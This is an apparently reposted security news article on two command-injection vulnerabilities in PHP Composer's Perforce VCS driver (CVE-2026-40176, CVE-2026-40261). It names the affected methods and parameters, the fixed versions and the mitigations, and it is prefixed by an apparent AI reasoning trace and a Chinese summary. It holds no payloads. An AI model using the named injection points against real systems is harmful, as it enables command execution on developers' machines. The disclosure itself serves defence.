嗯,用户让我总结一下这篇文章的内容,控制在一百个字以内,而且不需要特定的开头。首先,我需要通读整篇文章,抓住主要信息。 文章讲的是PHP Composer中的两个高危漏洞,允许攻击者通过恶意仓库配置和精心构造的输入,在使用Perforce版本控制系统时远程执行命令。这两个漏洞分别是CVE-2026-40176和CVE-2026-40261,CVSS评分分别是7.8和8.8。 接下来,我需要将这些信息浓缩到一百个字以内。要包括漏洞名称、影响、攻击方式以及建议的修复措施。可能还需要提到受影响的方法和版本。 然后,确保语言简洁明了,避免使用复杂的术语,让读者一目了然。同时,检查是否有遗漏的重要信息,比如漏洞的具体影响范围和修复建议。 最后,整合这些要点,形成一个流畅的总结句子。 </think> PHP Composer中的两个高危漏洞(CVE-2026-40176和CVE-2026-40261)允许攻击者通过恶意仓库配置或输入,在使用Perforce VCS时远程执行任意命令。这两个漏洞源于输入验证不足和未充分转义的问题。建议更新到Composer 2.9.6或2.2.27版本以修复漏洞,并避免从不可信源安装依赖项。 2026-4-15 08:19:26 Author: securityaffairs.com(查看原文) 阅读量:11 收藏
PHP Composer flaws enable remote command execution via Perforce VCS
Two high-severity flaws in PHP Composer could let attackers run arbitrary commands via malicious repository configs and crafted inputs affecting Perforce VCS.
Two high-severity vulnerabilities in PHP Composer could allow attackers to execute arbitrary commands. PHP Composer is a dependency manager for PHP that helps developers install and manage libraries their projects need. By defining packages in a composer.json file, it automatically downloads and updates them, resolving dependencies. It simplifies development and is widely used with frameworks like Laravel and Symfony.
The flaws impact the Perforce VCS driver and stem from improper input validation and insufficient escaping. By crafting a malicious composer.json or source reference with shell metacharacters, an attacker controlling a repository configuration could run commands on the user’s system.
“Please immediately update Composer to version 2.9.6 or 2.2.27 (LTS) by running composer.phar self-update. The new releases include fixes for two command injection security vulnerabilities in the Perforce VCS driver. CVE-2026-40261 was reported by Koda Reef and CVE-2026-40176 was reported by saku0512.” reads the advisory.
Below are the description for the two flaws:
- CVE-2026-40176 (CVSS score: 7.8) – Improper input validation allows an attacker controlling a malicious composer.json with a Perforce VCS repository to inject arbitrary commands, leading to execution in the context of the user running Composer.
- CVE-2026-40261 (CVSS score: 8.8) – Improper input validation due to insufficient escaping allows an attacker to inject arbitrary commands via a crafted source reference containing shell metacharacters.
Both vulnerabilities stem from improper escaping in Composer’s Perforce VCS driver when building shell commands.
CVE-2026-40176 affects the generateP4Command() method, where user-controlled connection parameters (port, user, client) are inserted without sanitization. This allows command injection via a malicious composer.json, but only when running Composer on untrusted root projects, not dependencies.
CVE-2026-40261 impacts the syncCodeBase() method, where an unescaped source reference enables command injection through crafted metadata. It can be exploited via malicious or compromised repositories, even without Perforce installed, especially when installing or updating dependencies from source.
Composer 2.9.6 (mainline) and 2.2.27 (2.2 LTS) address both vulnerabilities.
To mitigate CVE-2026-40261, avoid installing dependencies from source by using –prefer-dist or setting preferred-install to dist, and rely only on trusted repositories. For CVE-2026-40176, review composer.json files carefully, ensuring Perforce fields are valid and running Composer only on trusted projects.
According to the advisory, scans of Packagist.org and Private Packagist found no exploitation attempts. As a precaution, Perforce metadata publishing and the Perforce VCS driver were disabled on April 10, 2026. Private Packagist Self-Hosted users will receive updates and should upgrade Composer promptly and verify metadata.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, PHP Composer)
如有侵权请联系:admin#unsafe.sh